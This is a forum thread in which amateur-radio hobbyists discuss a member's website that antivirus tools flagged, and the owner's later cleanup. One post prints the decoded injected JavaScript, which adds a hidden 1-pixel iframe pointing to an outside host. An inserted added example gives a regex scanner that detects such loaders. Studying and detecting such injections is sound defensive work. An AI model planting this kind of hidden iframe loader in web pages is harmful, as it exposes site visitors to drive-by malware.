Author Topic: WA2ISE website hacked?  (Read 3522 times)
W8AAZ
« on: January 28, 2013, 06:15:48 PM »

I have often gone to the WA2ISE website to get submini tube info and he also has other stuff on the website.  However today I went there and got nothing but warning popups from my antivirus saying that there were malware attacks from the site that it was blocking.  I wonder how to contact him to give a heads up.  As his contact info is on the messed up webpage!   

WN2C
« Reply #1 on: January 28, 2013, 07:51:00 PM »

I sent him a PM on the Zed

G8HQP
« Reply #2 on: January 30, 2013, 06:10:09 AM »

Good. My anti-virus reported it had foiled an attack from that site. Let's hope he can soon fix it and be back up again.

W8AAZ
« Reply #3 on: January 30, 2013, 03:12:57 PM »

On another forum a poster replied that he had no problem, his APPLE computer reported no threats. Those folks never get over gloating....

G8HQP
« Reply #4 on: February 01, 2013, 07:25:44 AM »

Someone running Linux could have a look and report back? I should have thought of that a few days ago, but I have just had to tidy the table and so clear away my Raspberry Pi for a while.

W8AAZ
« Reply #5 on: February 01, 2013, 02:42:58 PM »

Tried it again today, white screen and popup message that the threat was blocked, something called "exploit blackhole exploit kit" or some such, as the warning popup window unpops itself fairly soon.  I do not try to push my luck by pursuing beyond that warning.  Too bad.  Another site I frequented for years got something rather nasty that would actually make me spend an afternoon debugging the computer.  I sent them warning about it.  Went back a week or so later and still got attacked.  Stayed away for many months and eventually it was safe to use again, but they had changed the format of the site so much I didn't like it, anyway.

KE4DRN
« Reply #6 on: February 01, 2013, 05:54:54 PM »

hi,

just tried the site and it works fine,
firefox and running trend micro here at the office.

73 james

DJ1YFK
« Reply #7 on: February 02, 2013, 08:57:02 AM »

There's a bit of JavaScript code embedded on that site that most certainly does not belong there.

It contains an array of scrambled JavaScript code which is then translated into some more JavaScript which, when executed, embeds an iframe into the site. This iframe, most likely on another hacked website, probably contained something malicious, but it doesn't seem to exist anymore (Error 404). Probably the owner of that other website (with an Italian domain name, probably completely unrelated to WA2ISE) has noticed the breach and cleaned up his server.

Code:
(function () {
    var fe = document.createElement('iframe');

    fe.src = 'http://EDITED.it.invalid/esd.php';
    fe.style.position = 'absolute';
    fe.style.border = '0';
    fe.style.height = '1px';
    fe.style.width = '1px';
    fe.style.left = '1px';
    fe.style.top = '1px';

    if (!document.getElementById('fe')) {
        document.write('<div id=\'fe\'></div>');
        document.getElementById('fe').appendChild(fe);
    }

})();

Bottom line: There's still some JavaScript on that website which doesn't belong there, but it isn't harmful. However the owner of the website should remove it, try to find out how it got there, and at the very least change his access password etc. to make further break-ins of this kind less likely to happen.

To protect oneself from problems by such malicious code from random websites, I highly recommend switching off JavaScript in the browser by default. For Firefox there's a great plugin called NoScript (http://www.noscript.net/) which allows very fine-grained script settings to be made for each website. There are similar things for other browsers too.

73
Fabian, DJ1YFK
« Last Edit: February 02, 2013, 09:02:46 AM by DJ1YFK »
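
A site owner can flag both the decoded snippet quoted in the post above and the scrambled-array form it describes with a static scan of each HTML file, without executing anything. This is an added example, not part of the original thread; the indicator names, the 40-element array threshold and the sample pages are assumptions constructed for illustration.

```javascript
// Added example (Node.js). Indicator names and thresholds are assumptions.
const INDICATORS = [
  ['creates-iframe', /createElement\(\s*['"]iframe['"]\s*\)/i],
  ['tiny-size', /\.(?:height|width)\s*=\s*['"]?[01](?:px)?['"]?\s*;/i],
  ['document-write', /document\.write\s*\(/i],
  ['decoder', /\b(?:eval|unescape)\s*\(|String\.fromCharCode/i],
  ['long-numeric-array', /\[\s*(?:\d{1,3}\s*,\s*){40,}/],
];
// Bodies of inline <script> elements (external src-only scripts are skipped).
function inlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].map((m) => m[1]).filter((b) => b.trim());
}

// Static <iframe> tags sized 0/1 px or hidden through an inline style.
function hiddenIframeTags(html) {
  const tags = html.match(/<iframe\b[^>]*>/gi) || [];
  return tags.filter((t) =>
    /\b(?:width|height)\s*=\s*["']?[01](?:px)?["'\s>]/i.test(t) ||
    /style\s*=\s*["'][^"']*(?:display\s*:\s*none|visibility\s*:\s*hidden)/i.test(t));
}

function scanHtml(html) {
  const findings = [];
  for (const body of inlineScripts(html)) {
    const hits = INDICATORS.filter(([, re]) => re.test(body)).map(([name]) => name);
    const hiddenFrame = hits.includes('creates-iframe') && hits.includes('tiny-size');
    const packed = hits.includes('decoder') && hits.includes('long-numeric-array');
    if (hiddenFrame || packed) findings.push({ kind: 'script', hits });
  }
  for (const tag of hiddenIframeTags(html)) findings.push({ kind: 'iframe-tag', tag });
  return findings;
}

// Constructed samples. INFECTED reuses the decoded form quoted in the post.
const INFECTED = `<html><body><h1>Tube data</h1></body></html>
<script>(function () {
  var fe = document.createElement('iframe');
  fe.src = 'http://EDITED.it.invalid/esd.php';
  fe.style.height = '1px';
  fe.style.width = '1px';
  document.body.appendChild(fe);
})();</script>`;
// PACKED wraps a harmless string as char codes, the way a scrambled loader would.
const codes = Array.from("console.log('constructed benign payload for this test')",
  (c) => c.charCodeAt(0));
const PACKED = `<script>var a=[${codes.join(',')}];eval(String.fromCharCode.apply(null,a));</script>`;
const CLEAN = `<script>document.write(new Date().getFullYear());</script>
<iframe width="560" height="315" src="https://video.example.invalid/embed"></iframe>`;
```

A hit is a reason to compare the file against a known-good copy, not proof of compromise; the regexes only see inline code and will miss loaders pulled in from external script files.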

W0BTU
« Reply #8 on: February 03, 2013, 12:04:28 AM »

There's a bit of JavaScript code embedded on that site that most certainly does not belong there. ... I highly recommend switching off JavaScript in the browser by default. For Firefox there's a great plugin called NoScript (http://www.noscript.net/)

Good observation, and great advice. I wouldn't think of using anything but Firefox and NoScript.

WA2ISE
« Reply #9 on: March 27, 2014, 08:19:12 PM »

I found this infection sometime in Feb of last year (2013).  I had two computers, one with Norton, the other with McAfee.  The Norton machine would block my web site, but McAfee didn't.  I looked at the html source code, didn't see anything, but when I ftp'ed that code to my McAfee machine, it reported it found something and stripped it out before saving it to a file on my PC.  I then ftp'ed this back to the web site, overwriting the old file.  The Norton machine stopped blocking this particular page.  I then did the same thing to all the rest of the html files, letting McAfee strip the crap off, and then sending them back, overwriting the infection files.

The web page hosting server tightened the security surrounding FTP.  "require explicit FTP over TLS"

G8HQP
« Reply #10 on: March 29, 2014, 12:07:38 PM »

I'm glad you were able to fix it. I enjoy visiting your site from time to time!

W0BTU
« Reply #11 on: March 29, 2014, 12:48:11 PM »

I found this infection sometime in Feb of last year (2013).  ... The web page hosting server tightened the security surrounding FTP.  "require explicit FTP over TLS"

I had a site or two hacked because some of the folders had public write permissions. That's something you might look at.